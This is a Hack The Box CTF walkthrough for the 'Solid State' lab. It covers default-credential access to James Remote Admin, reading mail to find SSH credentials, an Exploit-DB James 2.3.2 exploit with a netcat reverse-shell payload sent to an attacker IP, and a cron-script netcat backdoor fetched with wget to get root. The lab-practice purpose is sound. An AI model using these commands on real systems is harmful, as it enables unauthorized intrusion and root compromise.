Hello Friends!! Today we are going to solve a CTF Challenge “Solid State”. It is a lab that is featured in Hack the Box. They have an amazing collection of Online Labs on which you can practice your penetration testing skills online. They have labs ranging from beginner to Expert. Solid State is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online therefore they have a static IP. Solid State Lab has IP: 10.10.10.51.

Now, as always let’s begin our hacking with the port enumeration.

Command: nmap 10.10.10.51 -sV -p- –open  

As you can see in the above screenshot that couple of ports open among which we have port 80, 110, 119, 4555.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP.

After opening the IP in the browser we can see that it is a basic website, nothing exciting.

Now back to 4555, it runs service James Remote Admin 2.3.2. After searching a while on the internet, I got that the default password for logging in the Remote Admin is root: root.

And it is a golden rule to apply the default credentials, so let’s try to get in Remote Admin using the default credentials. For this we will use netcat as shown below in image.

nc 10.10.10.51 4555

Great we have logged in on the Remote Admin Service, after that we ran the HELP command to get the List of working commands.

Here listusers command draws our attention, let’s see what it does. Great, we have the list of mail users on the server.

Back to the HELP command we had the setpassword command. Let’s use it to change the passwords of all the users so that we can further enumerate.

Command: setpassword james 1234

Ok, so now we have the users for the POP3 service and their passwords. Now lets dig into that, for that we will use telnet.

telnet 10.10.10.51 110

User: John

Pass: 1234

LIST

After logging in using the Credentials of the user john, we ran the command LIST, which lists all the messages in jhon’s account. Let see if we find something here.

Nope hardluck !! we didn’t get much in this but lets try another users.

Again open a new telnet session but this time we enter the Credentials of user Mindy.

telnet 10.10.10.51 110

User: Mindy

Pass: 1234

list

Using LIST we got the mails in the account of mindy. Let’s open to see if we can get some hint to move forward in the mail.

After opening the mail we found sent mail from admin account by James to mindy  sharing his the SSH Login Credentials. It is a Jackpot!!

Username: mindy

Pass: [email protected]@

Let’s go and get the ssh shell of the machine and use midy credential for login into ssh.

ssh [email protected]

Cool!! We got access of victim’s PTS shell.

Since we have enumerated the target network and found Apache James Serer 2.3.2 is running and after Browsing through the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from here.

 

Paste above copied python code in a text file and make following changes inside payload as highlighted in below image and then save it, we have it as exploit.py on the desktop.

nc -e /bin/sh 10.10.14.3 8000

Here 10.10.14.3 is attacker’s IP and 8000 is listening port for reverse connection from targets network.

Now run above saved python file as I run using below command:

./exploit.py 10.10.10.51

Ok Done! The Exploit will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and as soon as we login the exploit begin to work as shown below.

Let’s open a netcat Listener to get the shell which will be generated after our exploit gets completely executed. Now we need to import the python file to reach the terminal and to do so type:

python -c “import pty; pty.spawn(‘/bin/bash’)”

Lovely!! So again we got access of victim’s system shell but this time we had access TTys shell of his system, now let check it directory.

ls

Here we can see user.txt which indicates we have almost completed our 1^st challenge.

I had use cat command for reading user.txt file and with this we had completed our first challenge.

Now let move towards 2^nd challenge for root.txt and currently we are in Mindy directory. For root.txt file we need to move into root but I have no idea for further step. Then I recall Mindy has received a mail from admin account send by James, there are chance of getting any hint from James therefore I prefer to grep running process of James by executing following command.

ps aux | grep james

Here aux will work as describe below:

a = display processes for all users
u = show the process’s user/owner
x = show processes not attached to a terminal

Great!! It has shown root process for opt file.

Then I move into /opt directory and run ls-al command for exploring all files and folder inside this directory.

cd opt

ls-al

So it shown two files among which I’m interested in tmp.py file.

 

When I used cat command for reading this file I found a python code inside it. This code was useless for me and to me it useful I need to edit this file by adding malicious code inside it therefore let copy this code first into a text file.

As given below in image you can see I had edit netcat backdoor using following command and save the file tmp.py, then transfer this file into victim’s system.

/bin/nc -e bin/bash 10.10.14.3 8081

I tried to download our malicious tmp.py file inside /opt it get failed due to limited access therefore first I downloaded this file in /tmp directory using wget command.

wget http://10.10.14.4/tmp.py

When it get successfully downloaded then I replace it into /opt directory

cp tmp.py /opt

cd /opt

ls

Great!! We can see tmp.py file inside /opt lets confirm this file using cat command

cat tmp.py

Awesome!!! We had successfully uploaded our one-liner netcat backdoor in victim’s system. Now let’s start netcat in a new terminal reverse connection.

nc -lvp 8081

Then I run crontab -l command for reverse connection and move back netcat terminal.

At netcat you will get reverse connection after 3 minutes from the time you will run crontab command. We have the root shell. And just by using the “ls” command we successfully located the root.txt

Great!! We got our 2nd flag successfully Enjoy Hacking!!

 

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here